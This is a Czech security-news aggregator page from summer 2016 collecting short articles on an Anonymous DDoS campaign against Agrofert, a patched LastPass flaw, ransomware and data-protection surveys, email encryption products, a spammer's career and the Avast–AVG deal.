Czech Articles - 0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16



Anonymous shodili web Agrofertu. Chtějí útočit na další firmy a zaměstnance

1.8.2016 Zdroj: Lupa.cz Hacking
Operace Blokáda vyvolaná zákonem umožňujícím cenzurovat internet má další pokračování. Shozeny byly weby Agrofertu či Penam.
Skupina, která se označuje za českou odnož hacktivistického hnutí Anonymous, dnes shodila web společnosti Agrofert (agrofert.cz), kterou ovládá ministr financí a šéf ANO Andrej Babiš. Má to být součástí takzvané Operace Blokáda (#OpBlokada), která má být odvetou za schválení zákona o hazardních hrách, v rámci něhož může stát blokovat webové stránky.

Skupina se chce zaměřit na další cíle kolem Babišova impéria. Mezi cíli jsou v dokumentu útočníků uvedeny weby společností HYZA, Čepro, Uniles, PREOL a Wotan Forest. Hacktivisté si vyhlédli také zaměstnance skupiny Agrofert, na které mají mimo jiné útočit spamem.

„Žádáme neprodlené zrušení EET či zákona o cenzuře internetu, jinak budou útoky nadále pokračovat,“ vzkazují hacktivisté k čerstvému útoku na Agrofert.
Web Wotan Forest se dnes občas s výpadky potkává. Stránky Agrofertu začaly po několika hodinách před šestou hodinou večer na pár minut fungovat, po chvilce byly opět nedostupné. Večer přestal fungovat také web pekáren Penam.

Hacktivisté k útokům využívají populární open source nástroj HOIC (High Orbit Ion Cannon). Pro zájemce o zapojení se do útoků je veřejně připraven instalační soubor společně s návodem k použití.

Prostřednictvím DDoS útočili už koncem května, kdy nejdříve shodili web Senátu a následně také policie a strany ČSSD. Akce prý mají pokračovat i nadále.

„Jakmile jednou vznikne státní blacklist, je to cesta k dalším blokacím, které budou o to snazší,“ říká skupina ke svým motivacím. „Ministerstvo financí vedené Andrejem Babišem nyní dostává téměř neomezenou pravomoc cenzurovat internet.“


LastPass měl (opět) problém, útočníci mohli získávat hesla uživatelů

1.8.2016 Zdroj: Lupa.cz Zranitelnosti
Nepříjemná bezpečnostní chyba v prohlížečových rozšířeních pro LastPass umožňovala útočníkům získávat uložená hesla.
Tavis Ormandy, člen týmu u Googlu, který se věnuje vyhledávání chyb, minulý týden zjistil, že LastPass pro Firefox je možné zmást natolik, že vydá hesla pro určitou službu, aniž by uživatel na této službě aktuálně byl. Stačilo k tomu dostat uživatele na připravené webové stránky a požádat LastPass o automatické vyplnění hesla.

Detaily Ormandyho zjištění už jsou známy a dle očekávání jde o zneužití toho, jakým způsobem se LastPass vsunuje do stránek (hlavně do vstupních prvků). Podstatné na nové chybě je, že velmi podobná chyba byla objevena již před rokem a týkala se rozšíření pro Chrome (a byla také již před rokem napravena).

LastPass v LastPass Security Updates uvádí, že opravena byla i čerstvě objevená chyba, a pokud používáte LastPass 4.0+, tak by už problém neměl existovat. Případná ruční instalace opravené verze je možná z lastpass.com/lastpassffx

Připomeňme, že LastPass měl v minulosti už více bezpečnostních problémů (viz například LastPass byl děravý, v případě pochybností si raději změňte heslo), včetně úniku dat (Správce hesel LastPass hlásí únik z databáze, změňte si heslo). Konkurenční správci hesel na tom nebyli o moc lépe.

Jedna z dobrých možností, jak se dalo zabránit zneužití v tomto případě, by bylo vypnutí automatického vyplňování hesel – mírná komplikace pro uživatele, který by zadávání hesel z LastPass musel vyvolávat přes menu. Vedle toho stále platí, že pro důležité služby byste vždy měli používat dvoufaktorové ověření přihlášení.


Kybernetičtí vyděrači jedou. Ransomware je nejziskovější malware

1.8.2016 Zdroj: SecurityWorld Viry
Z kyberzločinu se stává stále větší byznys. Zisky útočníků v první polovině roku 2016 strmě vzrostly a vyděračský software, tzv. ransomware, se stal nejziskovějším typem malwaru v historii. Cílem hackerů přitom nejsou jen firmy, ale stále častěji se zaměřují na neziskové organizace, spolky i charity. Organizace však bezpečnostní hrozby stále podceňují a neprovádějí pravidelné aktualizace, které průniky do sítě výrazně omezují. S těmito závěry přišla pravidelná studie Cisco 2016 Midyear Cybersecurity Report.

Report odhalil, že firmy útočníkům jejich snahu často usnadňují, neboť mají zranitelnou infrastrukturu, neprovádějí dostatečnou bezpečnostní hygienu v síti a probíhající útok nedokážou detekovat včas.

Organizace se potýkají se stále sofistikovanějšími verzemi škodlivého softwaru a u některých důležitých oborů, jako například ve zdravotnictví, dochází k výraznému nárůstu útoků. Společnost Cisco odhaduje, že budoucí ransomware bude mnohem hůře odhalitelný, neboť tolik nezatíží kapacitu procesoru infikovaného zařízení a omezí komunikaci s kontrolními servery.

Nejprve se totiž v systému rozmnoží a až poté spustí vlastní vyděračskou aktivitu s cílem maximalizovat zisky útočníků.

Studie zaznamenala, že v první polovině letošního roku hackerům výnosy z kybernetických útoků výrazně vzrostly. Důvodem jsou nové útočné metody i širší skupina cílů.

„Cisco 2016 Midyear Cybersecurity Report ukazuje, že útočníci stále rozšiřují záběr útoků a více se zaměřují na servery. Útoky častěji cílí na jejich zranitelnosti, a zejména se soustředí na servery Jboss. Globálně byl zjištěn průnik u 10 % z nich. Jedním z evergreenů pak zůstávají pokusy o průnik prostřednictvím Adobe Flash,“ říká Ivo Němeček, obchodní ředitel společnosti Cisco ČR.

Hlavním nedostatkem organizací zůstává neefektivní přehled o stavu a dění v síti a o koncových bodech a jejich aktivitě.

„Firmám stále trvá odhalení průniků do sítě průměrně 200 dní,“ dodává Ivo Němeček.

Studie Cisco 2016 Annual Security Report, publikovaná na začátku letošního roku, zjistila, že 9 z 10 zkoumaných zařízení obsahovaly známé zranitelnosti. I tentokrát testovali bezpečnostní experti více než 100 tisíc zařízení připojených k internetu. Nedostatky se objevily u všech výrobců a typů koncových zařízení. Každé z nich v průměru vykazovalo 28 známých zranitelností. Přitom tato zařízení byla aktivně provozována se známými zranitelnostmi průměrně více než 5 a půl roku.

Více než 9 % z nich dokonce vykazovalo zranitelnosti staré více než 10 let. Bezpečnostní experti se dále zaměřili na softwarovou infrastrukturu a na vzorku více než 3 milionů instalací, především Apache a OpenSSH, zjistili, že obsahují průměrně 16 zranitelností známých již 5 let.

Expertní tým Cisco Talos proto doporučuje 5 jednoduchých opatření, které mohou významně posílit bezpečnost firemního provozu:

Zlepšení bezpečnostní hygieny sítě jejím sledováním, včasnou aplikací oprav a aktualizací, segmentací, zavedením obrany na okrajích sítě, a to včetně zabezpečení e-mailu a internetového provozu a využitím nové generace firewallů a systémů pro prevenci průniků.
Integrace obrany a vybudování jednotné bezpečnostní architektury namísto zavádění dílčích řešení.
Měření doby detekce hrozeb a snaha o její zkrácení na minimum s cílem jejich okamžité neutralizace. Začlenění doby detekce jako klíčové metriky do podnikové bezpečnostní politiky.
Ochrana uživatelů na místech, kde se nachází a kde pracují, nejen systémů, s nimiž přicházejí do styku při připojení do firemní sítě.
Zálohování důležitých dat, rutinní ověřování jeho efektivity a zabezpečení těchto záloh proti napadení.


Biometrické ověřování plateb je za rohem

27.7.2016  Zdroj: SecurityWorld Zabezpečení
Podle nového průzkumu společnosti Visa mají evropští spotřebitelé při platbách kartou zájem využívat biometrické bezpečnostní prvky, a to zejména v kombinaci s dalším zabezpečením. Na 73 % spotřebitelů považuje podle průzkumu dvoufaktorovou autentifikaci platby s využitím biometrického prvku za bezpečný způsob ověření identity majitele účtu.
„Identifikace a verifikace prostřednictvím biometrických prvků v oblasti plateb přináší zjednodušení a zdokonalení spotřebitelského zážitku. Náš průzkum ukázal, že čím dál tím více lidí vnímá biometriku jako důvěryhodnou formu autentifikace a je s používáním této technologie na svých zařízeních obeznámeno,” říká Jonathan Vaux, výkonný ředitel pro inovace společnosti Visa Europe.

Scénář o biometrice jako jediné formě ověřování plateb by ale byl podle Jonathana Vauxe zatím spíše výzvou. „Na rozdíl od ověření PIN kódem, který může být zadaný jen správně nebo nesprávně, je biometrie založená na pravděpodobnosti shody se vzorem. Biometrické prvky fungují proto nejlépe v kombinaci s dalšími zařízeními, geolokačními technologiemi nebo dodatečnými metodami autentifikace,“ dodává Vaux.

Více než polovina Evropanů (51 %) si myslí, že biometrická verifikace, která potvrzuje identitu uživatele měřením jeho charakteristických znaků, jako jsou otisky prstů nebo vzor oční duhovky, proces platby urychlí a zjednoduší. Přes 30 % lidí pak podle průzkumu na biometrické autentifikaci oceňuje, že jejich data zůstanou v bezpečí i v případě ztráty nebo odcizení platebního zařízení.

„Postupně budou mít spotřebitelé možnost vybírat si ze stále více platebních metod. S tím jak se budou měnit naše platební návyky podle místa nákupu a použitého zařízení, budou se těmto případům muset přizpůsobovat i autentifikační metody plateb. Navzdory své pohodlnosti a bezpečnosti tak nebude biometrika jediným řešením a v budoucnosti uvidíme rozličné varianty ověřování v závislosti na konkrétní nákupní situaci,” pokračuje Jonathan Vaux.

Průzkum na 14 000 Evropanech ukázal, že nejdůležitější faktory pro přijetí biometrického ověřování plateb jsou diskrétnost, zkušenost a obeznámenost s tématem. Pro svou jednoduchost a bezpečnost je nejoblíbenější biometrickou metodou ověření otisku prstu. I co se samotné bezpečnosti týče, nejvíce (81 %) respondentů staví na první místo právě otisky prstů. Jako druhá nejbezpečnější biometrická metoda následuje sken oční duhovky se 76 procenty.

I proto více než polovina dotázaných (53 %) preferuje při placení identifikaci otiskem prstu před jinými metodami. 73 % respondentů vyhovuje tato forma biometrické autentifikace dokonce stejně jako vyplnění PIN kódu.

Autentifikace platby rozpoznáním hlasu nebo podle tváře by podle průzkumu zvolilo jen 15, respektive 12 % respondentů, a to v případě nákupu přímo v obchodě i platby online.


Nový průzkum ukazuje na zlepšení v ochraně dat, ale také na vyvíjející se hrozby

27.7.2016 Zdroj: SecurityWorld Zabezpečení
Společnost EMC oznámila výsledky nového průzkumu zabezpečení. Ty odhalily, že organizace podceňují narůstající výzvy spojené s ochranou svých dat a v důsledku toho zakoušejí ekonomické dopady ztráty dat.
Nová zjištění průzkumu EMC Global Data Protection Index 2016, který zpracovala společnost Vanson Bourne jako nezávislou studii podnikového zálohování mezi respondenty z 18 zemí světa, ukazují, že podnikům se sice podařilo omezit dopad čtyř největších tradičních rizik ztráty dat, nejsou však připraveny na nově vznikající hrozby, jež si tak vybírají svou daň namísto tradičních příčin.

V porovnání s výsledky průzkumu EMC Global Data Protection Index 2014 zaznamenalo v posledních 12 měsících ztrátu dat nebo narušení provozu o 13 % více podniků. S tím spojené potíže je stály v průměru 914 000 dolarů.

Společnost EMC zadala aktualizaci průzkumu, aby organizacím pomohla pochopit rychle se měnící podobu rizik ohrožujících podniková data a připravit se na ně. Podle výsledků průzkumu EMC Global Data Protection Index 2016 ztěžují moderní ochranu dat tři hlavní hrozby:

1) Ohrožení záložních dat

Téměř čtvrtina (23 %) respondentů zaznamenala ztrátu dat nebo neplánovaný výpadek systémů vinou bezpečnostního útoku zvenčí. Pokud započítáme i útoky zevnitř, vzroste toto číslo na více než třetinu podniků (36 %).

Podniky při tom stále častěji čelí nejen ohrožení primárních dat, ale také záloh a dalších dat uložených kvůli ochraně. Ať už bojují s kybervyděrači, kteří požadují výkupné za odemknutí dat zašifrovaných škodlivým softwarem (ransomware), nebo s jinými riziky spojenými se zálohováním a ochranou dat, potřebují podniky najít řešení, která přesunou jejich „data poslední záchrany“ do bezpečí.

2) Ohrožení dat v cloudu

Přes 80 % respondentů průzkumu uvedlo, že jejich organizace bude v nejbližších dvou letech provozovat alespoň část z osmi klíčových podnikových aplikací ve veřejném cloudu. Zároveň ovšem jen necelá polovina z nich odpověděla, že chrání data v cloudu před poškozováním, obdobný počet respondentů pak tato data chrání před smazáním.

Více než polovina účastníků průzkumu již ve veřejném cloudu provozuje poštovní aplikaci. A celkově již respondenti do veřejného cloudu přesunuli v průměru 30 % svého IT prostředí.

3) Měnící se potřeby ochrany

Přes 70 % organizací zapojených do průzkumu si není zcela jisto, že by v případě ztráty dat nebo neočekávaného výpadku systémů dokázalo systémy či data plně obnovit.

Sebedůvěrou respondenti neoplývají, ani pokud jde o výkon datových center: 73 % uvádí, že si nejsou zcela jisti, že jejich řešení udrží krok s vyšším výkonem a novými funkcemi flashových úložišť.


Zabezpečte si e-maily pomocí šifrování

27.7.2016 Zdroj: SecurityWorld Zabezpečení
Šifrování e-mailu se natolik zlepšilo, že je pošetilé ho nepoužívat. Hushmail, Virtru, HP Voltage, Datamotion, AppRiver, ProtonMail a Tutanova vás ochrání před slídivýma očima.
Kdysi jsem jako spoluautor napsal knihu o podnikovém e-mailu, ve které jsem přirovnal šifrování e-mailů k „ošklivé ráně v hrudi“. Bylo to v roce 1997, kdy jste si museli veškerou správu šifrovacích klíčů zajistit sami – a to bylo, řekněme, přinejmenším odrazující.

I když se situace od té doby výrazně zlepšila, šifrování poštovních zpráv stále není tak jednoduché, jak by mohlo být, a vyžaduje důkladné studium, chcete-li získat skutečně soukromou komunikaci, kterou nedokážou vaši konkurenti či vládní instituce sledovat.

V minulosti museli příjemci šifrovaných e-mailů používat stejný systém jako odesílatel a mnoho e-mailových klientů bylo v tomto směru obtížné nakonfigurovat.

V současné době nabízí mnoho produktů funkci „šifrování s nulovými nároky na znalosti“, což znamená, že můžete odeslat šifrovanou zprávu i tomu, kdo vámi vybranou šifrovací službu nepoužívá.

K dešifrování zpráv a k napsání odpovědí postačuje poskytnout heslo a v některých případech lze zprávu přečíst jen na základě autentizace, tedy prokázání své identity. Po prvotním navázání komunikace dokáže příjemce celkem snadno komunikovat prostřednictvím šifrovaných zpráv.

Kromě nulové potřeby znalostí šifrování usnadňují moderní produkty zasílání a přijímání zpráv, takže s pomocí modulů plug-in pro aplikaci Outlook a pro prohlížeče je potom šifrování podobně snadné jako stisk jednoho tlačítka.

Všechny testované produkty mají vylepšenou kontrolu nad přenosem zpráv, jako jsou nastavení data vypršení platnosti, možnost odvolat nepřečtené zprávy a zabránit jejich přeposílání, jakmile je příjemce přečte. To vše jsou dobrá znamení, že šifrování konečně dospělo.

Zůstal zde však jeden problém: Způsoby využití e-mailů se také vyvinuly a jsou složitější. Někteří z nás střídají klienty ve stolních počítačích i mobilních zařízeních a také používají jako e-mailového klienta webové rozhraní.

Někteří lidé upřednostňují aplikaci Outlook a mnoho organizací závisí na serverech Microsoft Exchange a také existují desítky poskytovatelů hostovaných e-mailových služeb založených na službách SaaS – jako jsou například Google Apps nebo Office 365.

To znamená, že jakékoliv šifrovací řešení musí pokrýt různé případy použití a různé koncové klienty. Navíc zde stále existuje velký nezájem koncových uživatelů o šifrování zpráv, přestože jim není neznámá sága Snowdena a další poučení o potřebě udržovat zabezpečenou komunikaci.

Pro analýzu současného stavu dostupných řešení jsme otestovali sedm produktů a zjistili, že spadají do tří funkčních skupin.

První jsou hostované e-mailové služby, které využívají komplexní šifrování přenosů zpráv. Obvykle se přitom k zabezpečenému zasílání a příjmu e-mailů používá webový klient daného poskytovatele.

Pokud už používáte hostovanou e-mailovou službu, bude nutné tohoto poskytovatele nahradit jednou z těchto služeb. V této kategorii jsme testovali Hushmail a ProtonMail.

Hushmail již existuje více než deset let, zatímco ProtonMail je relativně nový a stále je v rozšířené betaverzi. Tato kategorie je atraktivní pro menší sítě a místa s okamžitou potřebou šifrování a požadavkem rychlého zavedení.

Druhou skupinou jsou pak brány (gatewaye) pro šifrování e-mailů. Ty byly prvním druhem šifrovacích produktů a stále je lze na trhu nalézt. Vyžadují speciální moduly plug-in nebo servery umístěné v interní infrastruktuře, nakonfigurované za ochranným firewallem s přístupem k vašemu hlavnímu e-mailovému serveru. Do této kategorie patří produkty Datamotion SecureMail a HP Voltage SecureMail.

Tyto brány nabízejí velkou kontrolu nad způsobem zpracování e-mailů, nad případným přechováváním částí zpráv v místních úložištích zařízení i nad možnými způsoby obnovení hesel.

I když je to přitažlivé, s veškerou touto kontrolou přichází také větší náročnost správného nakonfigurování. A to je důvod, proč o tyto gatewaye klesá zájem, zejména nyní, když existuje tolik dalších možností.

Brány jsou stále užitečné pro firmy, které se buď zdráhají využívat cloud, nebo mají specifické důvody týkající se dodržování předpisů pro šifrování své e-mailové komunikace, jako jsou například makléři a zdravotnictví.

A konečně třetí skupinou jsou řešení založená výhradně na koncových klientech, která rozšiřují existující desktopový software pro e-maily, jako jsou například Outlook nebo Apple Mail.

Jde typicky o přídavné nástroje šifrující zprávy pomocí existující e-mailové infrastruktury. Do této kategorie patří Tutanota, Virtru a AppRiver.

Tato řešení jsou oblíbená ve firmách, které používají celou řadu e-mailových klientů a nechtějí rychle nasadit službu univerzálního šifrování nebo nemohou snadno vyměnit části své e-mailové infrastruktury (viz prezentace těchto produktů).

Existuje mnoho dalších šifrovacích služeb, které jsme netestovali, a to ze dvou důvodů. Zaprvé mnoho z nich je podobných službě ProtonMail, ale nabízejí jen šifrování osamocených poštovních schránek a nejsou vhodné pro celopodnikové nasazení.

Zadruhé několik dlouho na trhu působících dodavatelů šifrování se testu nechtělo zúčastnit, a to včetně dodavatelů bran jako Symantec (PGP) nebo ZixCorp.

Vítězové a poražení

Vzhledem k rozmanitosti situací v oblasti e-mailů a typů produktů jsme nemohli zvolit celkového jednoznačného vítěze. Každý z těchto produktů však může být velmi užitečný pro odpovídající situace.

Produkt Tutanota zatím i přes přítomnost některých inovativních funkcí nemůžeme doporučit do doby, než dostatečně dozraje.

Pokud budete využívat pro své e-maily server s internetovými standardy IMAP/SMTP, potom pro vás bude asi nejlepší volbou použít Hushmail nebo Virtru.

Hushmail používá kombinaci různých oborových standardů šifrovacích technologií k přenášení e-mailů z desktopu přes internet. Virtru má zase svůj vlastní ekosystém a sadu doplňků pro aplikaci Outlook, prohlížeče a Gmail, které mohou chránit vaše zprávy.

Pokud používáte MS Exchange nebo IBM Notes, může být lepším řešením Datamotion s jeho vlastní branou. Je ze sedmi testovaných produktů nejdražší, ale nabízí velkou flexibilitu konfigurace.

Voltage je také dobrou alternativou založenou na bráně gateway, pokud potřebujete velký rozsah kontroly pro správu e-mailových přenosů, a může fungovat na serverech platforem Linux i Windows.

Pokud nechcete nasadit šifrování pro každého a chcete tuto možnost poskytnout jen několika zaměstnancům nebo máte-li systém založený na protokolu POP, potom se podívejte na řešení AppRiver.

Jeho zajímavost je mimo jiné způsobená schopností zvládnout přílohy s velikostí až 5 GB, zatímco většina ostatních produktů dokáže zvládnout jen malé přílohy.

Přestože se ProtonMail hodí zejména pro jednotlivce, je ukázkou toho, co současná úroveň soukromí a paranoie dokáže udělat pro zajištění produktu se snadno použitelným šifrováním.

I když jeho uživatelské rozhraní zaostává za některými vyzrálejšími produkty, má několik funkcí, které je dobré prozkoumat, včetně výchozího dvojitého šifrování zpráv a způsobu, jak dokáže automaticky upozornit nové korespondenty na čekající šifrované zprávy.


Digitální stopy a jejich odstraňování

27.7.2016  Zdroj: SecurityWorld Zabezpečení
Jakýkoliv pohyb po internetu zanechává po naší činnosti stopy. A nemusíte být zrovna náčelník Apačů, abyste je našli. Takže jak je dobře zamaskovat?
Digitální stopy jsou informace, které uživatel zanechává v prostředí internetu či jako součást souborů. Tyto stopy o svém tvůrci prozradí víc, než by sám chtěl. Stopy v podobě metadat vznikají i při používání přístrojů z oblasti IT, při práci s různými typy souborů a při řadě dalších aktivit.

Stopy se dělí na aktivní a pasivní. Aktivní vznikají přičiněním uživatele vytvářením profilů, přispíváním na diskuzní fóra, interakcemi na sociálních sítích, nahráváním fotek či jiných souborů aj. Velmi zneužitelné stopy jsou příspěvky do technických fór s celým popisem problému, což často dělají i profesionálové v IT.

Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »
Pasivní stopy vznikají jako vedlejší produkt uživatelovy aktivity, jsou to záznamy serverů o chování konkrétního návštěvníka, délce návštěvy, aktivitě na daném webu, IP adrese a dalších údajích. K těmto informacím uživatel obvykle nemá přístup a může je ovlivňovat maximálně svým chováním či některými nastaveními.

Sledování stop závisí na tom, co se sledující chce dozvědět.

Marketing. Zde sledují mimo jiné pohyb uživatele po internetu, aktivitu a dobu výskytu na stránkách, klikání na odkazy, preference uživatele („to se mi líbí“ na Facebooku) a mnoho dalších aspektů. Marketingové společnosti obvykle data aktivně zaznamenávají a obchodují s nimi v obrovském množství. Dost stránek, které poskytují služby zdarma, funguje na bázi prodeje či výměny informací o uživatelích, případně data využívá pro personalizaci reklamních sdělení.
Kriminalistické vyšetřování. To bere digitální stopu jako důkazní materiál, sleduje podle potřeby data, která hrají roli v objasňování trestné činnosti, jako jsou pohyb uživatele po síti, doba přihlášení, soubory nahrané na internet, soubory v uživatelově zařízení, aktivita na diskuzních fórech aj. Často má k dispozici pokročilé nástroje a postupy, jak překonat běžné zabezpečení uživatelských účtů či jak se dostat k uživatelovým datům.
Kybernetický útočník podle svého záměru může sledovat různé skupiny podle konkrétních specifik (např. uživatele konkrétního serveru či služby) nebo konkrétní osobu. Podle toho přizpůsobuje své jednání, zjišťuje slabiny jak v zabezpečení systému, tak v chování uživatele.


Král nevyžádané pošty? Samuel Wallace

27.7.2016  Zdroj: SecurityWorld Spam
Novináři kvůli upoutání pozornosti nebo zvýšení atraktivity textu rádi nadsazují. A tak se s přízviskem „král spamu“ můžeme setkat u celé řady jmen. Pokud by si někdo ale toto označení skutečně zasloužil, pak je to Samuel Wallace: Hvězda jiných vychází, zazáří a zmizí, ale Wallace spamuje ve velkém bez ohledu na platformu už téměř třicet let.
Samuel Wallace se narodil v roce 1968. Dvakrát se pokusil studovat vysokou školu, ale nikdy neuspěl: vždy skončil v prvním semestru. Přesto se stal jednou z nejznámějších – a nejnenáviděnějších osobností – počítačového světa.

Svoji kariéru ovšem začal už v osmdesátých letech, kdy se věnoval masovému rozesílání reklamních nabídek pomocí faxů. Šlo o tak obtěžující fenomén, že tato praktika musela být v roce 1991 zakázána zákony.

Wallace je několikrát porušil, což mu vyneslo různě vysoké tresty. Až v roce 1995 ho napadlo, že by něco podobného mohl provozovat legálně ve světě počítačů. A založil si firmu Cyber Promotions (známou též jako Cyberpromo).

Pod rouškou reklamní agentury cpal inzerci všude možně. Měl nesmírně agresivní marketing: stal se známý tím, že ve velkém rozesílal reklamní sdělení – na rozesílání reklamních sdělení.

Stal se veřejnou tváří a svérázné metody obhajoval na konferencích nebo v televizních pořadech. Odpůrci mu dali přezdívku „Spamford“. On ji ovšem přijal za svou jako součást identity, dokonce si založil osobní stránku spamford.com.

Záhy se stal jedním z hlavních hráčů na poli e-mailové reklamy, ale to s sebou přineslo i silně negativní odezvu. Neměl problémy se zákonem – což se mu v podnikání nestávalo příliš často – ale byl nenáviděnou osobou v internetové komunitě.

Za chvíli nemohl najít poskytovatele, se kterým by mohl uzavřít smlouvu. Ještě před tím ale jako první začal používat několik taktik, jimiž mátl filtry spamu, obcházel různá pravidla nebo znesnadňoval své pronásledování.

Šlo například o falšování adresy odesílatele, přeposílání zpráv, uvádění většího počtu odesílatelů apod. Některé z těchto úskoků ve světě internetových útoků následně „zlidověly“.

Krok vedle

V roce 1998 Wallace oznámil, že opouští byznys se spamem. Firmu Cyberpromo přejmenoval na GTMI, zůstal jen v roli majitele a tvrdil, že od nynějška bude poskytovat toliko marketingové služby opt-in (tedy takové, se kterými budou oslovovaní předem výslovně souhlasit).

Projekt ale nefungoval, Wallaceho pověst ji stále provázela. Proto se stáhl úplně i z pozice majitele, ale ani to nepomohlo a GTMI později zkrachovala.

Wallace využil svou popularitu a jako DJ Masterweb začal vystupovat v klubech po celém New Hampshiru. Klub Plum Crazy mu dokonce patřil, ale i tento projekt zkrachoval (2004).

Jenže to vše byla podle všeho jen zástěrka spořádaného života, protože zpětně se provalilo, že Wallace měl už od roku 2001 web passthison.com. Ten začal jako první masově využívat k zobrazování reklamních sdělení vyskakovací okna.

Tuto techniku nevynalezl, jen ji převzal z pornografického průmyslu. Nikdo jiný si prostě na takto agresivní chování v počítačích netroufal.

Přechod k vydírání

Zároveň rozjel reklamní projekt SmartBot PRO.NET, ale ten zkrachoval. Záhy se totiž zjistilo (a od října 2004 to vyšetřovala Federální obchodní komise), že jde jen o záminku: nic netušící uživatele totiž infikoval spywarem.

Následně je na tuto skutečnost upozorňoval a za odstranění požadoval poplatek 30 dolarů. Je to snad jediný případ v historii ICT, který nahrává tvrzení „viry záměrně píší antivirové firmy“. I když v tomto případě šlo o cílené útoky, které spadají více mezi vydírání nebo podvod.

V lednu 2005 se záležitost urovnala dohodou: Wallace slibuje, že přestane útočit, na oplátku jsou stažena obvinění vznesená proti němu. Jenže už v březnu 2006 se obvinění znovu objevilo – tentokrát to dohoda nespravuje a soud vyměří pokutu přesahující pět milionů dolarů.

O dva roky později má Wallace opět křížek se zákonem, když jej žaluje služba MySpace za phishing a spamming. S pomocí zakázaných automatizovaných nástrojů totiž vytvořil jedenáct tisíc fiktivních účtů, jejichž prostřednictvím začal bombardovat ostatní uživatele reklamními sděleními, nutil je k instalaci spywaru nebo jim modifikoval prohlížeče.

V červenci 2007 soudce Audrey B. Collins zakázal Wallacemu zakládat nebo spravovat MySpace účty, publikovat zde veřejné komentáře nebo posílat soukromé zprávy. Ten ale rozsudek ignoroval a dál pokračoval ve svých aktivitách.

Rozbíhají se další a další řízení, až je v květnu 2008 odsouzen společně se svým partnerem Walterem Rinesem k zaplacení 230 milionů dolarů. V červnu 2009 musí vyhlásit osobní bankrot.

To už ale proti němu vede žalobu i Facebook. V říjnu 2009 federální soudce Jeremy D. Fogel odsuzuje Wallaceho k uhrazení 711 milionů dolarů Facebooku. A ještě k zaplacení pokuty čtyř milionů za instalaci spywaru.

V srpnu 2011 je před soudem znovu, a to za rozeslání 37 milionů reklamních zpráv na Facebooku (ve skutečnosti jich bylo mnohem více, ale k soudu se dostávají pouze dobře zdokumentované případy).

A naposledy je letos v srpnu shledán vinným za další prohřešky z let 2008 a 2009. Vzhledem k recidivě a opakovanému neuposlechnutí soudních příkazů mu hrozilo až 40 let nepodmíněně, nakonec ale dostává „jen“ tři roky.

Zřejmě ale není všem dnům konec, protože vzápětí vyšlo najevo, že Wallace používal v kybernetickém prostoru ještě jednu identitu: je totiž zároveň dalším známým spammerem vystupujícím pod jménem Davide Sinful-Saturdays Fredericks. A ten byl v minulých letech mimořádně aktivní...


Překvapení: Avast za 1,3 miliard dolarů kupuje AVG

27.7.2016  Zdroj: SecurityWorld Zabezpečení
Dvě původně české antivirové firmy se spojují. Avast si za více než 32 miliard korun kupuje AVG.
To je tedy překvapení. Avast výrobce antivirových programů kupuje svého konkurenta původem také z Československa AVG. Za konkurenční firmu zaplatí 1,3 miliardy dolarů. Obě firmy začínaly na přelomu 80. a 90. let minulého století právě v Praze a v Brně. Dnes sice mají obě v Česku dominantní část vývoje, ale tváří se jako americké společnosti, které se ke svým kořenům přiliš nehlásí.

Podle oznámení obou firem transakce proběhne v hotovosti, kdy Avast zaplatí za jednu akcii 25 USD, což je o 33 % více, než byla v době oznámení cena na akciovém trhu. Celá transakce je již schválena boardem AVG, který ji doporučil akcionářům akceptovat.

Podle vyjádření Avastu pomůže akvize konkurenta zejména v prudce se rozvíjejícím segmentu internetu věcí.

"Získáme náskok," okomentoval akvizici šéf Avastu Vince Stecler.

"Věříme, že spojení s AVG nám přinese další růst a že je vhodné i pro naše akcionáře," prohlásil ředitel AVG Gary Kovacs.

Uvidíme, jak se bude firmám, které vsadily na dostribuci bezpečnostního softwaru zdarma v novém konglomerátu dařit.


České firmy podceňují kybernetické hrozby

27.7.2016  Zdroj: SecurityWorld Hrozby
Společnost VMware zveřejnila výsledky průzkumu zaměřeného na oblast kybernetické bezpečnosti v České republice. Průzkum poukázal na to, že české podniky si riziko kybernetických útoků příliš nepřipouští. Na otázku týkající se zranitelnosti odpovědělo 98 % IT manažerů, že infrastrukturu ve své firmě jako zranitelnou nevnímá.
Češi se v tomto ukazují jako přehnaně optimističtí v porovnání se zbytkem Evropy. Podle průzkumu společnosti VMware v regionu EMEA (Evropa, Střední Východ a Afrika) totiž očekává více než třetina IT manažerů vážný kybernetický útok v příštích 90 dnech.

Jak odhalil výzkum, ochrana proti kybernetickým útokům patří mezi prioritami firem působících v České republice na nejnižší pozice, za klíčovou ji označilo pouze 15 % dotazovaných. První tři místa obsadily tradiční obchodní cíle, jako je růst firmy, akvizice zákazníků a inovace.

Rizika spojená s kybernetickými hrozbami, jako je ztráta intelektuálního vlastnictví, kompromitace zákaznických dat, případně ohrožení třetích stran, přitom mohou mít pro firmu nedozírné následky, ať už se jedná o horší obchodní výsledky, poškození dobrého jména firmy nebo ztrátu konkurenční výhody.

„Zatímco výsledky našeho průzkumu v regionu EMEA poukazují na to, že firmy musí čelit narůstajícímu riziku kybernetických útoků, v České republice je situace velice rozdílná a vážného kybernetického útoku během příštích 90 dnů se obává pouze 5 % dotazovaných. Se vzrůstající digitalizací a zvyšujícím se počtem kybernetických útoků je ochrana firemní infrastruktury stále náročnější. V takovém prostředí už tradiční nástroje a metody nemusí být dostačující,“ komentuje Vladimír Střálka, Country Manager společnosti VMware pro Českou republiku a Slovensko.

Více než tři čtvrtiny dotazovaných (77 %) označily jako největší riziko pro firemní bezpečnost a nejpravděpodobnější terč kybernetického útoku nedbalé nebo nedostatečně informované zaměstnance.

Vlastní zaměstnanci jsou považováni za hrozbu i v případě narušení dat. Podle IT manažerů jsou nejčastější příčinou úniku dat nevyškolení zaměstnanci (79 %), zaměstnanci ztrácející mobilní zařízení (55 %) a nepoctiví zaměstnanci (52 %).


Pozor! Na discích z druhé ruky zůstává plno privátních informací

27.7.2016 Zdroj: SecurityWorld Hrozby
Než svůj starý HDD odhodíte pryč nebo přeprodáte skrze bazarovou službu, jakými jsou eBay či Craigslist, dejte si pozor, aby vaše data byla opravdu pečlivě smazána; jinak by se mohla dostat do nepovolaných rukou.
Nová studie prokázala, že velká část uživatelů nechtěně dává k dispozici osobní fotky, finanční údaje a různá další data kvůli nedokonalému smazání dat.

Blancco Technology Group, firma, specializovaná právě na mazání dat, provedla na toto téma průzkum. Náhodně nakoupila 200 secondhandových úložných jednotek přes eBay a Craigslist; cílem bylo zjistit, zda se společnosti podaří nějaká data „zachránit“.

